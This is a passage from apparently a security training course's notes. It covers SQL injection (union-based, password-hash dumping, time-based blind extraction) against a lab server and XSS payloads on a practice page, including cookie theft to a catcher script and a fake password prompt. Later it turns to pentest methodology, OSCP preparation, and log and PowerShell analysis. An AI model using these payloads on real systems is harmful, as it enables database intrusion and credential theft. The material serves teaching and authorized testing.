1102. http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
1103. -----------------------------------------------------------------------
1104.  
1105. We are using a union select statement because we are joining the developer's query with one of our own.
1106. Reference:
1107. http://www.techonthenet.com/sql/union.php
1108. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
1109. It removes duplicate rows between the various SELECT statements.
1110.  
1111. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
1112.  
1113. ---------------------------Type This-----------------------------------
1114.  
1115. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
1116. -----------------------------------------------------------------------
1117.  
1118. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
1119.  
1120. ---------------------------Type This-----------------------------------
1121.  
1122. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
1123. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
1124. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
1125. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
1126.  
1127. -----------------------------------------------------------------------
1128.  
1129.  
1130.  
1131.  
1132. - Another way is to see if you can get the backend to perform an arithmetic function
1133.  
1134. ---------------------------Type This-----------------------------------
1135.  
1136. http://45.77.162.239/bookdetail.aspx?id=(2)
1137. http://45.77.162.239/bookdetail.aspx?id=(4-2)
1138. http://45.77.162.239/bookdetail.aspx?id=(4-1)
1139.  
1140.  
1141.  
1142. http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
1143. http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
1144. http://45.77.162.239/bookdetail.aspx?id=1*1
1145. http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
1146. http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
1147. http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
1148. http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
1149. http://45.77.162.239/bookdetail.aspx?id=2 &0#
1150.  
1151.  
1152.  
1153. http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
1154. http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
1155. http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
1156. http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
1157.  
1158. -----------------------------------------------------------------------
1159.  
1160.  
1161. ###############################
1162. # Blind SQL Injection Testing #
1163. ###############################
1164. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
1165.  
1166. 3 - Total Characters
1167. ---------------------------Type This-----------------------------------
1168.  
1169. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
1170. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
1171. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
1172. -----------------------------------------------------------------------
1173.  
1174. Let's go for a quick check to see if it's DBO
1175.  
1176. ---------------------------Type This-----------------------------------
1177.  
1178. http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
1179. -----------------------------------------------------------------------
1180.  
1181. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
1182.  
1183. ---------------------------Type This-----------------------------------
1184.  
1185. D - 1st Character
1186. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
1187. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
1188. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
1189. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
1190.  
1191. B - 2nd Character
1192. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1193. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1194.  
1195. O - 3rd Character
1196. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1197. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
1198. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1199. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1200. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
1201. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
1202. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
1203.  
1204. -----------------------------------------------------------------------
1205.  
1206.  
1207.  
1208.  
1209.  
1210.  
1211.  
1212. ################################
1213. # Playing with session cookies #
1214. ################################
1215.  
1216. -----------------------------------------------------------------------
1217. Step 1: Browse to NewEgg.com
1218. -------------------------Paste this into Firefox-----------------------------------
1219. https://secure.newegg.com/
1220. ----------------------------------------------------------------------------------
1221.  
1222.  
1223. Step 2: Browse to the shopping cart page NewEgg.com
1224. -------------------------Paste this into Firefox-----------------------------------
1225. https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
1226. ----------------------------------------------------------------------------------
1227.  
1228.  
1229. Step 3: View the current session ID
1230. -------------------------Paste this into Firefox-----------------------------------
1231. javascript:void(document.write(document.cookie))
1232. ------------------------------------------------------------------------------------
1233.  
1234. Step 4: Go back to the shopping cart page (click the back button)
1235. ---------------------------------------------------------------------------------
1236. https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
1237. ---------------------------------------------------------------------------------
1238.  
1239.  
1240. Step 5: Now let's modify the session ID
1241. -------------------------Paste this into Firefox-----------------------------------
1242. javascript:void(document.cookie="PHPSessionID=wow-this-is-fun")
1243. ------------------------------------------------------------------------------------
1244.  
1245.  
1246.  
1247. Step 6: Go back to the shopping cart page (click the back button)
1248. ---------------------------------------------------------------------------------
1249. https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
1250. ---------------------------------------------------------------------------------
1251.  
1252.  
1253.  
1254. Step 7: View the current session ID
1255. -------------------------Paste this into Firefox-----------------------------------
1256. javascript:void(document.write(document.cookie))
1257. ------------------------------------------------------------------------------------
1258.  
1259. -----------------------------------------------------------------------
1260.  
1261. ###########################################
1262. # What is XSS #
1263. # http://45.63.104.73/2-Intro_To_XSS.pptx #
1264. ###########################################
1265.  
1266. OK - what is Cross Site Scripting (XSS)
1267.  
1268. 1. Use Firefox to browse to the following location:
1269. ---------------------------Type This-----------------------------------
1270.  
1271. http://45.63.104.73/xss_practice/
1272. -----------------------------------------------------------------------
1273.  
1274. A really simple search page that is vulnerable should come up.
1275.  
1276.  
1277.  
1278.  
1279. 2. In the search box type:
1280. ---------------------------Type This-----------------------------------
1281.  
1282. <script>alert('So this is XSS')</script>
1283. -----------------------------------------------------------------------
1284.  
1285.  
1286. This should pop-up an alert window with your message in it proving XSS is in fact possible.
1287. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1288.  
1289.  
1290. 3. In the search box type:
1291. ---------------------------Type This-----------------------------------
1292.  
1293. <script>alert(document.cookie)</script>
1294. -----------------------------------------------------------------------
1295.  
1296.  
1297. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
1298. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
1299.  
1300. 4. Now replace that alert script with:
1301. ---------------------------Type This-----------------------------------
1302.  
1303. <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
1304. -----------------------------------------------------------------------
1305.  
1306.  
1307. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
1308.  
1309.  
1310. 5. Now view the stolen cookie at:
1311. ---------------------------Type This-----------------------------------
1312.  
1313. http://45.63.104.73/xss_practice/cookie_stealer_logs.html
1314. -----------------------------------------------------------------------
1315.  
1316.  
1317. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
1318.  
1319.  
1320.  
1321.  
1322.  
1323.  
1324. ############################
1325. # A Better Way To Demo XSS #
1326. ############################
1327.  
1328.  
1329. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
1330.  
1331.  
1332. Use Firefox to browse to the following location:
1333. ---------------------------Type This-----------------------------------
1334.  
1335. http://45.63.104.73/xss_practice/
1336. -----------------------------------------------------------------------
1337.  
1338.  
1339.  
1340. Paste this in the search box
1341. ----------------------------
1342.  
1343.  
1344. ---------------------------Type This-----------------------------------
1345.  
1346. <script>
1347. password=prompt('Your session is expired. Please enter your password to continue',' ');
1348. document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
1349. </script>
1350. -----------------------------------------------------------------------
1351.  
1352.  
1353. Now view the stolen cookie at:
1354. ---------------------------Type This-----------------------------------
1355.  
1356. http://45.63.104.73/xss_practice/passwords.html
1357.  
1358. -----------------------------------------------------------------------
1359.  
1360. ###############################################################
1361. # Question 1: What is the process that you use when you test? #
1362. ###############################################################
1363.  
1364. Step 1: Automated Testing
1365.  
1366. Step 1a: Web Application vulnerability scanners
1367. -----------------------------------------------
1368. - Run two (2) unauthenticated vulnerability scans against the target
1369. - Run two (2) authenticated vulnerability scans against the target with low-level user credentials
1370. - Run two (2) authenticated vulnerability scans against the target with admin privileges
1371.  
1372. The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
1373.  
1374. A good web application vulnerability scanner comparison website is here:
1375. http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
1376.  
1377.  
1378. Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
1379.  
1380. When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
1381.  
1382.  
1383. Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
1384.  
1385.  
1386. Also, be sure to save the scan results and logs. I usually provide this data to the customer.
1387.  
1388.  
1389.  
1390. Step 1b: Directory Brute Forcer
1391. -------------------------------
1392. I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
1393.  
1394.  
1395.  
1396. Step 2: Manual Testing
1397.  
1398. Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
1399.  
1400. Step 2a: Spider/Scan the entire site with Burp Suite
1401. Save the spider and scan results. I usually provide this data to the customer as well.
1402.  
1403.  
1404. Step 2b: Browse through the site using the 3 question method
1405. Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
1406.  
1407. Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
1408.  
1409. Here is what I mean:
1410. http://www.site.com/page.aspx?parametername=parametervalue
1411.  
1412. When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
1413.  
1414. http://www.site.com/page.aspx?parametername=[ payload ]
1415.  
1416. You need to ensure that you send the payload this way, and like this below:
1417.  
1418. http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
1419.  
1420. This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
1421.  
1422.  
1423.  
1424.  
1425.  
1426.  
1427.  
1428. ###########################################
1429. # Question 2: How much fuzzing is enough? #
1430. ###########################################
1431. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
1432.  
1433. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
1434.  
1435.  
1436. Step 1: Ask yourself the 3 questions per page of the site.
1437.  
1438. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
1439.  
1440. Step 3: When you load your fuzz strings - use the following decision tree
1441.  
1442. - Are the fuzz strings causing a default error message (example 404)?
1443. - If this is the case then it is most likely NOT vulnerable
1444.  
1445. - Are the fuzz strings causing a WAF or LB custom error message?
1446. - If this is the case then you need to find an encoding method to bypass
1447.  
1448.  
1449. - Are the fuzz strings causing an error message that discloses the backend type?
1450. - If yes, then identify DB type and find correct syntax to successfully exploit
1451. - Some example strings that I use are:
1452. '
1453. "
1454. () <----- Take the parameter value and put it in parenthesis
1455. (5-1) <----- See if you can perform an arithmetic function
1456.  
1457.  
1458. - Are the fuzz strings rendering executable code?
1459. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
1460. - Some example strings that I use are:
1461. <b>hello</b>
1462. <u>hello</u>
1463. <script>alert(123);</script>
1464. <script>alert(xss);</script>
1465. <script>alert('xss');</script>
1466. <script>alert("xss");</script>
1467.  
1468.  
1469.  
1470. #######################
1471. # Bug Bounty Programs #
1472. #######################
1473. https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65
1474.  
1475.  
1476. ############################
1477. # Bug Hunter's Methodology #
1478. ############################
1479. https://www.youtube.com/watch?v=C4ZHAdI8o1w
1480. https://www.youtube.com/watch?v=-FAjxUOKbdI
1481.  
1482.  
1483.  
1484.  
1485.  
1486. #########################################
1487. # Web Application Security Job Roles #
1488. # Application Assessor level 1 #
1489. #########################################
1490. Required Technical Skills: Comfortable with basic Linux/Windows (Linux+/MCSA)
1491. Comfortable with basic web application fundamentals
1492. Comfortable with security fundamentals (Security+)
1493.  
1494.  
1495.  
1496. Job Task: Run Web App security scanners and assist with documentation of Web App vulnerabilities
1497.  
1498.  
1499. Tools Used:
1500. HP Web Inspect
1501. IBM AppScan
1502. AppSpider
1503. Acunetix Web App Vulnerabilities
1504. Netsparker
1505. Qualys
1506.  
1507.  
1508.  
1509.  
1510. #########################################
1511. # Web Application Security Job Roles #
1512. # Application Assessor level 2 #
1513. #########################################
1514. Required Technical Skills: Comfortable with manual web app pentesting (eWPTv1/GWAPT)
1515. Comfortable with basic web application programming
1516. Comfortable researching IT security issues
1517.  
1518.  
1519.  
1520. Job Task: Run Web App security scanners and assist with documentation of Web App vulnerabilities
1521. Perform manual vulnerability validation
1522. Analyze public exploit and develop threat analysis reports
1523. Assess simple applications for vulnerabilities
1524.  
1525.  
1526. Tools Used:
1527. Burp Suite
1528. OWASP Zap
1529. Fiddler
1530. Charles Proxy Web App Vulnerabilities
1531.  
1532.  
1533.  
1534. #########################################
1535. # Security Operations Center Job Roles #
1536. # Application Assessor level 3 #
1537. #########################################
1538. Required Technical Skills: Comfortable with manual web app pentesting (eWPTv2)
1539. Comfortable with manual mobile app app pentesting (eMAPT)
1540. Comfortable with advanced web application programming
1541.  
1542.  
1543.  
1544. Job Task: Run Web App security scanners and assist with documentation of Web App vulnerabilities
1545. Perform manual vulnerability validation
1546. Analyze public exploit and develop threat analysis reports
1547. Assess complex web apps and mobile applications for vulnerabilities
1548.  
1549.  
1550. Tools Used:
1551. Burp Suite
1552. OWASP Zap
1553. Fiddler
1554. Charles Proxy Web App Vulnerabilities
1555.  
1556.  
1557.  
1558.  
1559.  
1560. -------------------------------------------------------------------------------------------------------------
1561.  
1562.  
1563.  
1564. ####################################
1565. ####################### How to prepare for the OSCP exam ################################
1566. ####################################
1567.  
1568. The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.
1569.  
1570.  
1571. Issue 1. Lack of a thorough attack process
1572. ==========================================
1573. - Host discovery
1574. - Service discovery
1575. - Service version discovery
1576. - Vulnerability research
1577. - Linux (port 111)/Window (port 445) Enumeration
1578. - Webserver vulnerability scan
1579. - Directory brute force every webserver
1580. - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
1581. - Brute force all services
1582.  
1583.  
1584.  
1585.  
1586. Issue 2. Lack of automation of the process
1587. ==========================================
1588. - Organize your notes and resources so you can automate your attack process:
1589. - https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
1590. - https://github.com/sinfulz/JustTryHarder
1591. - https://herrfeder.github.io/pentesting/2018/09/30/OSCP-Cheat-Sheet.html
1592.  
1593. - Research attacks scripts on the internet to enhance your methodology
1594.  
1595. - OSCP scripts
1596. - https://github.com/codingo/Reconnoitre
1597. - https://github.com/mikaelkall/massrecon
1598. - https://github.com/fchyla/pwk_scripts
1599.  
1600. - Network Pentest Automation Scripts
1601. - https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
1602. - https://github.com/1N3/Sn1per
1603. - https://github.com/leebaird/discover
1604.  
1605.  
1606.  
1607. Issue 3. Failing to document all steps being performed and their output
1608. =======================================================================
1609.  
1610.  
1611.  
1612.  
1613. Issue 4. Lack of sleep during the exam
1614. ======================================
1615.  
1616.  
1617.  
1618.  
1619. Issue 5. Failing to reboot target machines prior to attack
1620. ==========================================================
1621.  
1622.  
1623.  
1624. --------------------------------------------------------------------------------------------------------------
1625.  
1626.  
1627. A good strategy to use to prepare for the OSCP would be:
1628.  
1629. Step 1. Ensure that you are comfortable with Linux
1630. --------------------------------------------------
1631. - LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
1632. - Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)
1633.  
1634. You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
1635. https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
1636. https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
1637. https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E
1638.  
1639.  
1640.  
1641. 2. You should be comfortable with the following tools:
1642. ------------------------------------------------------
1643.  
1644. Nmap:
1645. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo
1646.  
1647. Metasploit:
1648. https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja
1649.  
1650. Burp Suite:
1651. https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
1652.  
1653. Sqlmap:
1654. https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75
1655.  
1656. Nikto:
1657. https://www.youtube.com/watch?v=GH9qn_DBzCk
1658.  
1659. Enum4Linux:
1660. https://www.youtube.com/watch?v=hA5raaGOQKQ
1661.  
1662. RPCINFO/SHOWMOUNT:
1663. https://www.youtube.com/watch?v=FlRAA-1UXWQ
1664.  
1665. Hydra:
1666. https://www.youtube.com/watch?v=rLtj8tEmGso
1667.  
1668.  
1669.  
1670. 3. You need to comfortable with basic exploit development
1671. ---------------------------------------------------------
1672.  
1673. Basic assembly:
1674. https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
1675.  
1676. Basic exploit development (first 5 videos in the playlist):
1677. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
1678.  
1679.  
1680. 4. You need to be comfortable with privilege escalation
1681. -------------------------------------------------------
1682. Linux
1683. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
1684.  
1685. Windows
1686. https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
1687. http://www.fuzzysecurity.com/tutorials/16.html
1688.  
1689.  
1690. ------------------------------------------------------------------------------------------------------------------------
1691.  
1692.  
1693.  
1694.  
1695.  
1696.  
1697.  
1698. #######################
1699. # Log Analysis basics #
1700. #######################
1701. Download this file and open it with Notepad
1702. http://45.63.104.73/WhatHappened.txt
1703.  
1704.  
1705. There are 4 steps to log analysis:
1706.  
1707. 1. Reduce the noise
1708. 2. Group LIKE data
1709. 3. Rename fields to make it easier to read
1710. 4. Repeat
1711.  
1712.  
1713.  
1714.  
1715.  
1716. ##############################################
1717. # Log Analysis with Linux command-line tools #
1718. ##############################################
1719. The following command line executables are found in the Mac as well as most Linux Distributions.
1720.  
1721. cat – prints the content of a file in the terminal window
1722. grep – searches and filters based on patterns
1723. awk – can sort each row into fields and display only what is needed
1724. sed – performs find and replace functions
1725. sort – arranges output in an order
1726. uniq – compares adjacent lines and can report, filter or provide a count of duplicates
1727.  
1728.  
1729. ##############
1730. # Cisco Logs #
1731. ##############
1732.  
1733. -----------------------------Type this-----------------------------------------
1734. wget http://45.63.104.73/cisco.log
1735. -------------------------------------------------------------------------------
1736.  
1737. AWK Basics
1738. ----------
1739. To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
1740.  
1741. -----------------------------Type this-----------------------------------------
1742. cd ~/log_analysis
1743. cat cisco.log | awk '{print $5}' | tail -n 4
1744. -------------------------------------------------------------------------------
1745.  
1746.  
1747.  
1748. Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
1749.  
1750. -----------------------------Type this-----------------------------------------
1751. cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
1752. -------------------------------------------------------------------------------
1753.  
1754.  
1755.  
1756. While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
1757.  
1758. -----------------------------Type this-----------------------------------------
1759. cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
1760. -------------------------------------------------------------------------------
1761.  
1762.  
1763.  
1764.  
1765. Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
1766.  
1767. -----------------------------Type this-----------------------------------------
1768. cat cisco.log | grep %LINEPROTO-5-UPDOWN:
1769.  
1770. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
1771.  
1772. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
1773.  
1774. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
1775. --------------------------------------------------------------------------------
1776.  
1777.  
1778.  
1779.  
1780.  
1781.  
1782.  
1783. If you are interested in running PowerShell on Mac OS X, or Linux you can check out the following link:
1784. https://www.howtogeek.com/267858/how-to-install-microsoft-powershell-on-linux-or-os-x/
1785.  
1786.  
1787.  
1788.  
1789.  
1790.  
1791. #####################
1792. # Powershell Basics #
1793. #####################
1794.  
1795. PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
1796.  
1797. PowerShell file extension end in .ps1 .
1798.  
1799. An important note is that you cannot double click on a PowerShell script to execute it.
1800.  
1801. To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell. Make sure that you run it as an administrator
1802.  
1803. ------------------------Type This------------------------------
1804. cd c:\
1805. dir
1806. cd
1807. ls
1808. ---------------------------------------------------------------
1809.  
1810.  
1811. To obtain a list of cmdlets, use the Get-Command cmdlet
1812. ------------------------Type This------------------------------
1813. Get-Command
1814. ---------------------------------------------------------------
1815.  
1816.  
1817. You can use the Get-Alias cmdlet to see a full list of aliased commands.
1818. ------------------------Type This------------------------------
1819. Get-Alias
1820. ---------------------------------------------------------------
1821.  
1822.  
1823. Don't worry you won't blow up your machine with Powershell
1824. ------------------------Type This------------------------------
1825. Get-Process | stop-process Don't press [ ENTER ] What will this command do?
1826. Get-Process | stop-process -whatif
1827. ---------------------------------------------------------------
1828.  
1829. To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
1830. ------------------------Type This------------------------------
1831. Get-Help Get-Command
1832.  
1833. Get-Help Get-Service –online
1834.  
1835. Get-Service -Name TermService, Spooler
1836.  
1837. Get-Service –N BITS
1838. ---------------------------------------------------------------
1839.  
1840.  
1841.  
1842.  
1843.  
1844. - Run cmdlet through a pie and refer to its properties as $_
1845. ------------------------Type This------------------------------
1846. Get-Service | where-object { $_.Status -eq "Running"}
1847. ---------------------------------------------------------------
1848.  
1849.  
1850.  
1851. - PowerShell variables begin with the $ symbol. First lets create a variable
1852. ------------------------Type This------------------------------
1853. $serv = Get-Service –N Spooler
1854. ---------------------------------------------------------------
1855.  
1856. To see the value of a variable you can just call it in the terminal.
1857. ------------------------Type This------------------------------
1858. $serv
1859.  
1860. $serv.gettype().fullname
1861. ---------------------------------------------------------------
1862.  
1863.  
1864. Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
1865. ------------------------Type This------------------------------
1866. $serv | Get-Member
1867.  
1868. Get-Member -InputObject $serv
1869. ---------------------------------------------------------------
1870.  
1871.  
1872.  
1873.  
1874. Let's use a method and a property with our object.
1875. ------------------------Type This------------------------------
1876. $serv.Status
1877. $serv.Stop()
1878. $serv.Refresh()
1879. $serv.Status
1880. $serv.Start()
1881. $serv.Refresh()
1882. $serv.Status
1883. ---------------------------------------------------------------
1884.  
1885.  
1886. If you want some good command-line shortcuts you can check out the following link:
1887. https://technet.microsoft.com/en-us/library/ff678293.aspx
1888.  
1889.  
1890.  
1891.  
1892. #############################
1893. # Simple Event Log Analysis #
1894. #############################
1895. Let's setup a directory to work in:
1896. ------------------------Type This------------------------------
1897. cd c:\
1898.  
1899. mkdir ps
1900.  
1901. cd ps
1902. ---------------------------------------------------------------
1903.  
1904. Step 1: Dump the event logs
1905. ---------------------------
1906. The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
1907.  
1908. To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
1909. If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
1910. ------------------------Type This------------------------------
1911. Get-EventLog -LogName application | Export-Clixml Applog.xml
1912.  
1913. type .\Applog.xml
1914.  
1915. $logs = "system","application","security"
1916. ---------------------------------------------------------------
1917.  
1918.  
1919. The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
1920. ------------------------Type This------------------------------
1921. $logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
1922. ---------------------------------------------------------------
1923.  
1924.  
1925.  
1926.  
1927. Step 2: Import the event log of interest
1928. ----------------------------------------
1929. To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
1930. Store the results in a variable.
1931. Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
1932.  
1933. The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
1934. ------------------------Type This------------------------------
1935. $seclog = Import-Clixml security.xml
1936.  
1937. $seclog | select -Last 5
1938. ---------------------------------------------------------------
1939.  
1940. Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
1941. ------------------------Type This------------------------------
1942. Get-EventLog Application -After (Get-Date).AddDays(-1)
1943. ---------------------------------------------------------------
1944. You can use '-after' and '-before' to filter date ranges
1945.  
1946. One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
1947. By default, an ordinary user does not have permission to read the security log.
1948.  
1949.  
1950. I had another student ask me if we can go back in hours instead of days and the answer is yes.
1951. ------------------------Type This------------------------------
1952. Get-EventLog Application -After (Get-Date).AddHours(-1)
1953. ---------------------------------------------------------------
1954.  
1955.  
1956.  
1957. Step 3: Drill into a specific entry
1958. -----------------------------------
1959. To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
1960.  
1961. ------------------------Type This------------------------------
1962. $seclog | select -first 1 | fl *
1963. ---------------------------------------------------------------
1964.  
1965. The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
1966.  
1967. ------------------------Type This------------------------------
1968. ($seclog | select -first 1).message
1969.  
1970. (($seclog | select -first 1).message).gettype()
1971. ---------------------------------------------------------------
1972.  
1973.  
1974. In the *nix world you often want a count of something (wc -l).
1975. How often is the SeSecurityPrivilege privilege mentioned in the message property?
